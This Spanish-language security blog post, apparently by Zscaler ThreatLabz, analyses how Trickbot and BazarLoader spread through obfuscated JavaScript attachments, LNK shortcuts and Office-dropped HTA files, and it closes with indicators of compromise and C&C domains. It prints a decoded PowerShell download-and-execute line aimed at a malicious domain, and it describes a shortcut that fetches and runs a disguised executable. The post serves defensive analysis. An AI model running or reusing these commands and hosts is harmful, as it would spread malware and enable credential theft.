Ideas e investigación

Las nuevas campañas de Trickbot y BazarLoader utilizan múltiples vectores de entrega

Las nuevas campañas de Trickbot y BazarLoader utilizan múltiples vectores de entrega

El equipo de investigación de Zscaler ThreatLabz supervisa miles de archivos diariamente rastreando amenazas nuevas y generalizadas, incluido uno de los troyanos bancarios más destacados de los últimos cinco años: Trickbot. Trickbot lleva activo desde 2016 y está vinculado a un gran número de campañas maliciosas que involucran la minería de bitcoin y el robo de información bancaria, información de identificación personal (PII) y credenciales. BazarLoader es un producto secundario de este troyano, desarrollado por los mismos autores. Ambos son particularmente peligrosos, ya que son fácilmente modificables y capaces de entregar cargas útiles multietapa, así como de tomar el control de los ordenadores por completo.

ThreatLabz ha descubierto a los operadores de Trickbot utilizando nuevos enfoques para entregar cargas útiles en recientes campañas de ataques. Las muestras de malware que analizamos estaban bien elaboradas y altamente ofuscadas con capacidades de evasión de sandbox. En esta publicación del blog, mostraremos el análisis de los diferentes vectores de entrega utilizados por Trickbot y BazarLoader.

Puntos clave:

1. Los archivos Script y LNK añaden técnicas de evasión para aprovechar las amenazas de malware.

2. La ofuscación multicapa se utiliza para impedir el análisis de archivos JS y LNK.

3. Un adjunto de Office suelta un archivo HTA con fragmentos de funciones HTML y javascript.

4. Se utilizan dominios recientemente registrados para entregar amenazas.

Trickbot está ampliando su gama de tipos de archivos para la entrega de malware

En campañas anteriores, las cargas útiles de Trickbot se soltaban generalmente como archivos adjuntos maliciosos de Microsoft Office. En el último mes, hemos visto que el malware también ha utilizado un gran volumen de archivos javascript, junto con diversos formatos de archivo, como se muestra en los siguientes gráficos:

 Trickbot general bloqueado en el sandbox

Fig. 1: Trickbot bloqueado en Zscaler Cloud Sandbox

Bazar general bloqueado en el sandbox

Fig. 2: BazarLoader bloqueado en Zscaler Cloud Sandbox

En este blog, exploraremos la cadena de ataque para múltiples vectores de entrega, que incluyen: 

  • Trickbot se propaga a través de archivos de script
  • Trickbot se propaga a través de archivos LNK
  • BazarLoader se propaga a través de archivos adjuntos de Office

Trickbot se propaga a través de archivos de script

Trickbot logra la intrusión utilizando correos electrónicos de spam agrupados con adjuntos javascript maliciosos, como los siguientes:  

Spam

Fig. 3: Adjuntos de correo electrónico de spam

En este caso, el archivo javascript [5B606A5495A55F2BD8559778A620F21B] tiene tres capas de ofuscación que se utilizan principalmente para evadir y omitir entornos de sandbox. A continuación se muestra la instantánea de la primera capa ofuscada:

Primera capa ofuscada

Fig. 4: Primera capa de ofuscación en javascript

Además de hacer un esfuerzo extremo por hacer que los archivos javascript estén muy ofuscados, los autores de malware también han añadido grandes cantidades de código basura al final para que sea más difícil depurar. El código basura consta simplemente de cadenas ofuscadas generadas aleatoriamente que no desempeñan ningún papel en el código malicioso.

Código de correo basura para dificultar el análisis

Fig. 5: Código de correo basura para dificultar el análisis

Usando la función eval() hemos liberado la segunda capa en la que el código malicioso está integrado con más código de correo no deseado. Después de eliminar esta capa de código basura, la función eval() se utiliza una vez más para recuperar la capa final de código. Podemos ver que los autores de Trickbot utilizaron el método setTimeout(), que evalúa una expresión después de 967 milisegundos para retrasar la ejecución en el sandbox. Esto ayuda al malware a evadir los entornos sandbox.

Segunda capa

Fig. 6: Segunda capa de ofuscación en javascript

En la captura anterior podemos ver el método replace implementado en el código donde "hdBDJ" y las cadenas "tSJVh" se eliminan de las variables "YHPhEFtKjqbCmAZ" y "kVYJOrLSqvdAWnaGTX", respectivamente, para obtener la cadena final.

Capa final

Fig. 7: Capa final

El javascript malicioso ejecuta cmd.exe como proceso hijo, luego cmd.exe ejecuta powershell.exe para descargar Trickbot como carga útil. 

Flujo de ejecución: 

Wscript.exe ->cmd.exe->powershell.exe

Powershell.exe integrado con el comando codificado base64 y después de decodificar el comando siguiente es:

IEX (New-Object Net.Webclient).downloadstring(https://jolantagraban{.}pl/log/57843441668980/dll/assistant{.}php")

JS Sandbox

Fig. 8: Detección de Javascript Downloader por Zscaler Cloud Sandbox

Trickbot se propaga a través de archivos LNK

Por lo general, los usuarios ven las extensiones LNK de Windows (LNK) como accesos directos y hemos observado con frecuencia que los ciberdelincuentes utilizan archivos LNK para descargar archivos maliciosos como Trickbot. Trickbot oculta el código en la sección de argumento, en la sección de propiedades del archivo LNK. El autor del malware añadió espacios adicionales entre el código malicioso para intentar dificultar la depuración del código por parte de los investigadores. Hemos visto esta técnica utilizada anteriormente en la campaña de Emotet, que utilizaba archivos adjuntos maliciosos de Office en 2018.

LNK final

Fig. 9: Código integrado en la sección de propiedades de LNK

Descargando Trickbot:

  1. LNK descarga el archivo de 45.148.121.227/images/readytunes.png utilizando un argumento silencioso para que el usuario no pueda ver ningún mensaje de error o acción de progreso.
  2. Después de la descarga, el malware guarda el archivo en la carpeta Temp con el nombre application1_form.pdf.
  3. Por último, se cambia el nombre del archivo de application1_form.pdf a support.exe y se ejecuta. Aquí, support.exe es Trickbot.

Lnk sandbox

Fig. 10: Detección de LNK Downloader por Zscaler Cloud Sandbox

BazarLoader se propaga a través de archivos adjuntos de Office

Esta es una de las otras técnicas utilizadas en TA551 APT también conocida como Shathak. Los documentos de Office maliciosos sueltan el archivo HTA en "C\ProgramData\sda.HTA". Este archivo HTA contiene HTML y vbscript diseñados para recuperar un DLL malicioso con el fin de infectar un host vulnerable de Windows con BazarLoader. 

Una vez habilitado para macros, el proceso mshta.exe se ejecuta para descargar una carga útil. En el pasado, se ha observado que esta campaña entrega BazarLoader y Trickbot.

Fig. 11: Cadena de ataque del archivo DOC para descargar BazarLoader

Los datos codificados en base64 se implementan en la etiqueta HTML <div>, que se utiliza posteriormente con javascript.

HTA_HTML

Fig. 12: Archivo HTA abandonado, codificación maliciosa en base64 bajo la sección HTML <div>

A continuación se muestra la instantánea de los datos base64 de decodificación en la que podemos ver cómo se descarga la carga útil y se guarda como FriIFriend.jpg en la máquina víctima:

HTA decodificado

Fig. 13: Archivo HTA abandonado, datos base64 de decodificación

Redes: C&C para descargar BazarLoader

Networking

Fig. 14: Enviar solicitud para descargar BazarLoader

También hemos observado dominios recién registrados (NRD) creados específicamente para distribuir estas cargas útiles, utilizando un stealer entregado a través de correo electrónico de spam y agrupado con un archivo adjunto malicioso de Microsoft Office.

NRD

Fig. 15: Dominio recién registrado

Sandbox DOC

Fig. 16: Detección de Zscaler Cloud Sandbox del descargador de archivos de Office maliciosos

JS.Downloader.Trickbot

Win32.Backdoor.BazarLoader

VBA.Downloader.BazarLoader

MITRE ATT&CK

 

T5190

Recopile información de la red de víctimas

T1189

Compromiso de acompañamiento

T1082

Detección de información del sistema

T1140

Desofuscar / descodificar archivos o información

T1564

Ocultar artefactos

T1027

Archivos o información ofuscados

 

Indicadores de compromiso

 

MD5

Nombre de archivo

Tipo de archivo

B79AA1E30CD460B573114793CABDAFEB

100.js

JS

AB0BC0DDAB99FD245C8808D2984541FB

4821.js

JS

192D054C18EB592E85EBF6DE4334FA4D

4014.js

JS

21064644ED167754CF3B0C853C056F54

7776.js

JS

3B71E166590CD12D6254F7F8BB497F5A

7770.js

JS

5B606A5495A55F2BD8559778A620F21B

68.js

JS

BA89D7FC5C4A30868EA060D526DBCF56

Subcontractor Reviews (Sep 2021).lnk

LNK

 

MD5

Nombre de archivo

Tipo de archivo

C7298C4B0AF3279942B2FF630999E746

a087650f65f087341d07ea07aa89531624ad8c1671bc17751d3986e503bfb76.bin.sample.gz

DOC

3F06A786F1D4EA3402A3A23E61279931

-

DOC

 

URL asociadas:

jolantagraban.pl/log/57843441668980/dll/assistant.php

blomsterhuset-villaflora.dk/assistant.php

d15k2d11r6t6rl.cloudfront.net/public/users/beefree

C&C:

Dominio

Carga útil

jolantagraban.pl

Trickbot

glareestradad.com

BazarLoader

francopublicg.com

BazarLoader

 

Manténgase informado sobre los últimos consejos y noticias en materia de transformación digital.

Al enviar el formulario, declara estar de acuerdo con nuestra política de privacidad.